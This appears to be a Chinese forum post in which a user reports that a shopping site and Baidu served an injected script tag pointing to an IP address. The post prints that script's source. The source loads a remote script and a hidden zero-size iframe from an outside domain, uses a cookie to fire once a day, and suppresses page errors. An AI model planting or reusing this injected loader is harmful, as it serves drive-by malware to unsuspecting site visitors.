今天我女朋友上某化妆品在线购物商城,发现平时浏览速度很快的网站居然N久才打开,我就郁闷了,结果发现无端端地出现了“<script src=http://66.186.33.44/n.js></scrip>”。打开百度,也出现了同样的代码。向程序高手请教后说是被黑客下了木马。不仅是我,还有很多人遇到了此类状况。哈哈,看来今天有重头戏看了.
某在线购物商城
百度
谷歌还算正常。。
太平洋电脑网也正常
下面的是<script src=http://66.186.33.44/n.js></script>的源代码
document.writeln("<script src=\"http:\/\/ora.3168a.com\/s368\/NEwJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function oK_KaiShi(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http:\/\/ora.3168a.com\/s368\/t368.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_KaiShi();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")
去网上查询了一下:66.186.33.44 发现如下结果
共2页: 上一页 1 [2] 下一页